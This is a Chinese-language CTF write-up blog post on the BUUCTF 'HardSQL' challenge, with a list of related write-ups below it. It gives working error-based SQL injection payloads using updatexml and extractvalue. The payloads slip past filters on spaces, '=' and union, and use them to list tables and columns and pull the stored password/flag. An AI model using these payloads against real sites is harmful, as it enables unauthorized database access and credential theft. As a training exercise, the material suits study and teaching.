[BUUCTF刷题]HardSQL

最新推荐文章于 2024-07-22 11:00:07 发布
最新推荐文章于 2024-07-22 11:00:07 发布
阅读量2k 收藏 4
点赞数 1
分类专栏: buuctf刷题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43952190/article/details/107096009
版权

HardSQL

  1. 进入后是sql注入页面,过滤了一些字符,先进行fuzz测试。
    在这里插入图片描述
  2. 发现过滤了union,双写也无法绕过,所以不能使用常规的方法进行注入。但发现没有过滤extractvalue和updatexml。
  3. 也过滤了空格,使用括号绕过。
  • 首先,注数据库名称
username=admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))%23&password=1

在这里插入图片描述

  • 然后得到表名(过滤=,使用like)
username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=1

在这里插入图片描述
表名:H4rDsq1

  • 得到H4rDsq1的字段名。
username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(H4rDsq1)),0x7e),1))%23&password=1

在这里插入图片描述
得到字段名:id,username,password;

  • 获取用户名和密码
	username=admin'or(updatexml(1,concat(0x7e,(select(password)from(H4rDsq1)),0x7e),1))%23&password=1

在这里插入图片描述
只出现了一部分flag。

  • 使用left()和right()左右进行拼接

username=admin’or(updatexml(1,concat(0x7e,(select(left(password,25))from(H4rDsq1)),0x7e),1))%23&password=1
username=admin’or(updatexml(1,concat(0x7e,(select(right(password,25))from(H4rDsq1)),0x7e),1))%23&password=1

在这里插入图片描述
在这里插入图片描述
得到flag:
flag{b281390b-acf4-4c74-8450-6ae768d24655}

marsxu626
关注
专栏目录
BUUCTF——[极客大挑战 2019]HardSQL
doraemon12345的博客
06-01 249
打开题目,进行常规注入,发现都行不通,union、空格和and被过滤了,尝试extractvalue()报错注入可行,开始做题,建议做的时候可以先用burp抓包在里面做,在网页上做请先带好痛苦面具(有耐心的当我没说,嘿嘿)。 先爆库名: payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23 得到库名爆表名: payload:?username=1&password=12
buuctf刷题
小飒的博客
07-11 281
重温一下buuctf前面的题目 hint: flag in ffffllllaaaagggg mb_substr() 函数返回字符串的一部分mb_strpos():返回要查找的字符串在别一个字符串中首次出现的位置checkFile函数的作用: 判断page是否被设置,是否为字符串 判断page是否在whitelist中 以?为分割符取出之前的字符,保存在page判断_page 判断p​age判断_page是否在whitelist中 url解码后以?为分割符取出之前字符,判断是否在whitelist中?fil
buuctf-HardSQL
m0_62094846的博客
04-02 1412
这道题过滤了很多sql注入的关键词(可以用bp,fuzz出来,下次试试) 包括空格,但是没有过滤报错注入的两个关键词updatexml和extractvalue 用报错注入 查库名(geek) ?username=1'or(updatexml(1,concat(0x7e,(database()),0x7e),1))%23&password=1 查找所有数据库 ?username=admin'or(updatexml(1,concat(0x7e,(select(grou...
BUUCTF刷题记录(密码学部分)
最新发布
2301_79140522的博客
07-22 798
这是我写的第一篇博客,记录一下在BUUCTF中的刷题记录。
BUUCTFHardSQL[极客大挑战 2019]
金 帛的博客
06-06 1402
buucft记录贴
BUUCTF WEB HardSql
qq_41696858的博客
10-13 255
这题考的是报错注入 判断注入类型还是跟之前一样的,一个单引号’直接看出来是单引号闭合 下面就是注入方式了,之前的双写,堆叠肯定就不用想了,试试报错,emmm 关于报错注入,可以看这一篇,感觉写的还挺详细的,https://developer.aliyun.com/article/692723 基础payload: 账号:a'^extractvalue(1,concat('~',(select(database()))))#,密码123 成功爆破出来库名geek 空格被过滤了,所以需要空格来绕过 知道注入方
buuctf-[极客大挑战 2019]HardSQL(小宇特详解)
小宇的web博客
01-26 3078
buuctf-[极客大挑战 2019]HardSQL(小宇特详解) 遇到了SQL注入,先尝试一下万能密码,虽然感觉%100不能用 果不其然 双写再试一下发现也不行 这里使用extractvalue和updatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号 使用extractvalue() /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database
buuctf刷题记录
mackilo的博客
02-16 2966
2022-1-16 reverse2 扔到IDA64里解析, F5生成伪代码 通过分析得出经过一定的变换后与flag进行比较的 查看flag的值,是{hacking_for_fun} 再返回前面看如何对flag进行变换的,将105、114、49转换成值, 箭头所指的函数功能为,把flag中存在的’i’以及’r’转换成’1’,进而得出正确flag。 2022-1-17 内涵的软件 下载好以后发现是乱码的exe文件,拖到ExeinfoPE里查看信息, 没有加壳,用IDA打开,查看main函数 可以看到跳
BUUCTF刷题系列
qq_45655564的博客
07-11 510
[HCTF 2018]WarmUp 查看网页源代码,得到source.php 可以得到 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
BUUCTF [极客大挑战 2019] HardSQL 1
m0_74167420的博客
06-18 286
原因:在输入' 或者 # 号时,'会被识别出来过滤掉,#会注释掉后面的内容,因此要进行url编码。在该题目中,双写被过滤掉了,同时空格,=,union也被过滤了。或者, payload为: 用 ^ 符号代替 or。1、阅读题目,是SQL注入的题目类型。2、尝试万能密码和堆叠注入,均被过滤。
BUUCTF---web---[极客大挑战 2019]HardSQL
2201_75556700的博客
05-19 811
7、 太可恶了,只爆出了一半,问题不大,我们使用right()函数,爆出password的 ,一般flag的长度为32位,加上前面爆出了大概有二十来个,继续爆右边大概15个就可以凑完整,不放心的话,可以爆长点。2、使用万能密码发现不可以,这种题前面有很多,这道题用前面的绕过方法不行,得换一种前面没有用过的方法,最近刚学了报错注入,前面就没有用这个方法,这里试试。查阅资料后发现需要构造下面的方法 and用^替换,#用%23替换,空格用()替换。4、用类似的方法查表名:这里注意=用like替换。
BUUCTF [极客大挑战 2019]HardSQL
m0_63253040的博客
03-28 2404
还是这个熟悉的登录页面 尝试万能密码登录,发现有过滤,一个一个试 过滤了空格,=,等等许多,双写也无法绕过,那么换报错注入试试
[BUUCTF]HardSQL(writeup)
weixin_63306244的博客
06-22 202
这是因为extractvalue函数限制了一次字符串只能输出32位。所以就用常用的" like "和" () "来绕过。发现select、ascii、空格、=等被过滤。输入admin / 2'or'1。使用bp试试看过滤了哪些东西。因为“=”、“空格”被过滤了。sql注入题进入后直接惯例。就确定了需要用报错注入来做。由此类推下去得到下一句语句。他只给了你前半段的flag。得到数据库名后构造下一句。这是为什么,那该怎么办呢。但是当你输入后会发现。再加上之前页面的报错。
Buuctf-[极客大挑战 2019]HardSQL
m0_63563528的博客
04-13 284
的,任何可以计算出结果的语句都可以用括号围起来,而括号的两端,可以没有多余的空格。我们知道,出现这个说明闭合成功了,但是之后发现它过滤了好多字符和语句,我输入。拼接一下flag,把重复部分删咯,就可以成功提交。又得到了:98-8e23-3728c2f96a1d}报错注入回显嘛,直接获取数据库名“geek”空格被过滤了 ,怎样绕过呢?我来试一下:输入1'(or)#
BUUCTF:[极客大挑战 2019]HardSQL
末初的CSDN博客
11-07 607
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]HardSQL 使用Burpfuzz测试过滤了哪些关键字 过滤了空格、=、substring、mid等字符 Trick 使用()代替空格 使用like代替= 使用right、left代替substring、mid 注入过程如下 1'or(1)like(2)%23 1'or(updatexml('~',concat('~',
Buuctf:[极客大挑战 2019]HardSQL
fcz___的博客
03-12 300
payload:用户名:1’^(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#密码:1。可以看到,or, by, and union 等都过滤了。好我们先记下这半边,查一下又半边再接上就行了。好家伙,又是他.这次他又有能耐了。我们先试试万能能密码。我们跑个fuzz看看过滤了啥。
CTF-Web-[极客大挑战 2019]HardSQL
归子莫的博客
05-03 2947
CTF-Web-[极客大挑战 2019]HardSQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客大挑战 2019]HardSQL 打开题目的实例 思路 SQl的题目,首先试一试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值